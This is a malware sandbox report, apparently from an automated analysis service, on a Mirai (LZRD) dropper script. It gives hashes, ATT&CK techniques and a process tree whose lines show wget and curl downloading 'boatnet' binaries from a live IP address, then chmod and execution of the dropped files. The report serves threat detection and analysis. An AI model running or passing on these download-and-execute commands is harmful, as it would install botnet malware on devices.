mirai | a6bf5dd9b9c5ea86b4a816ea60f94bc0cf68ef6c23ec63d52edf9ddf875d7e34

Analysis

max time kernel
11s
max time network
15s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
19-01-2025 17:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

2KB
MD5

a6ab6f96f6881539ccc0aefa53d99da6
SHA1

eeeb59012c94058a106073e1595f84df20445979
SHA256

a6bf5dd9b9c5ea86b4a816ea60f94bc0cf68ef6c23ec63d52edf9ddf875d7e34
SHA512

ef0e55585920063d79f5508c6546ebe72dae9c8a5d59faf2fa3d3f3200fa6e970c0ead949638fd853bd752536aea1784fe70397fde0e8bee12478e55b3e6c600

Score

10^/10

mirai lzrd antivm botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
676	chmod
688	chmod
696	chmod
704	chmod

Executes dropped EXE 4 IoCs

ioc	pid	Process
/tmp/WTF	677	WTF
/tmp/WTF	689	WTF
/tmp/WTF	697	WTF
/tmp/WTF	706	WTF

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-1.dat	upx
behavioral2/files/fstream-4.dat	upx

Checks CPU configuration 1 TTPs 4 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 8 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
680	wget
684	curl
687	cat

Writes file to tmp directory 8 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/boatnet.mips	wget
File opened for modification	/tmp/boatnet.mips	curl
File opened for modification	/tmp/boatnet.arc	wget
File opened for modification	/tmp/boatnet.arc	curl
File opened for modification	/tmp/boatnet.i468	curl
File opened for modification	/tmp/boatnet.x86	wget
File opened for modification	/tmp/boatnet.x86	curl
File opened for modification	/tmp/WTF	ohshit.sh

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:650
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.x86
  2⤵
  - Writes file to tmp directory
  PID:658
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:665
- /bin/cat
  cat boatnet.x86
  2⤵
  PID:674
- /bin/chmod
  chmod +x boatnet.x86 ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-f8DRw4 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:676
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:677
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:680
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:684
- /bin/cat
  cat boatnet.mips
  2⤵
  - System Network Configuration Discovery
  PID:687
- /bin/chmod
  chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-f8DRw4 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:688
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:689
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.arc
  2⤵
  - Writes file to tmp directory
  PID:692
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.arc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:694
- /bin/cat
  cat boatnet.arc
  2⤵
  PID:695
- /bin/chmod
  chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-f8DRw4 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:696
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:697
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.i468
  2⤵
  PID:699
- /usr/bin/curl
  curl -O http://154.213.186.64/hiddenbin/boatnet.i468
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:700
- /bin/cat
  cat boatnet.i468
  2⤵
  PID:703
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-240a3117a79344cd8c777522777d3880-systemd-timedated.service-f8DRw4 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:704
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:706
- /usr/bin/wget
  wget http://154.213.186.64/hiddenbin/boatnet.i686
  2⤵
  PID:707

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/WTF

Filesize
30KB

MD5
4f16ad7bf124db03b82939cfae92f15e

SHA1
6c6d17f48d583c5d3c002f4fc3a5390642d637fe

SHA256
96d6d379169a9a89a3704fbdeebce0698200440dcd5e6d814a96f2960f463573

SHA512
c01e6c9fd4475b69092e1cc6f9eaadefc54d91dffcee63c1c23f9ad3b392791f0371f841f075a948ce67f8d65387fbaef38c943d67511f9d143d83667e50c2cf

Download Submit
/tmp/WTF

Filesize
121KB

MD5
ec59d866ca314089702cad40a77aeebc

SHA1
4fa9bd7716542472cfa27dc9dc4dd664633af350

SHA256
c9216d4e33ba2a5ad059029216b4401f360e3db0e326975ebf088b8a8588d472

SHA512
d42862983fe554e1ce6873fb9e5763451cf052d97452bcdc92c298a374f922e57d76569d915708a261890088f8da0b881e6407979b497486ce7da7493f3a650b

Download Submit
/tmp/WTF

Filesize
220B

MD5
f1c24d9fa40a047ae22d2d3ae7dfeac9

SHA1
750274b02d5f5b00026a4f55b020f4285c693533

SHA256
219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc

SHA512
36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259

Download Submit
/tmp/boatnet.x86

Filesize
28KB

MD5
3630b4a04d550fb036675b516a910399

SHA1
7dd4e3efc4a7713d80ec4b8fbc5c0fd649038e7b

SHA256
a288c8c9d8fd6c92636bef0e8acf08f0d0d20b4108af37cea8385e7ad947dc67

SHA512
e33d21707d574422331610445e4fcdc08b7064f6988c022d27cc3650392940561891bd3ba7d97bc3ee1653ab818c7c815c65b2e8ffa0a14b9c6ea801da499b71

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads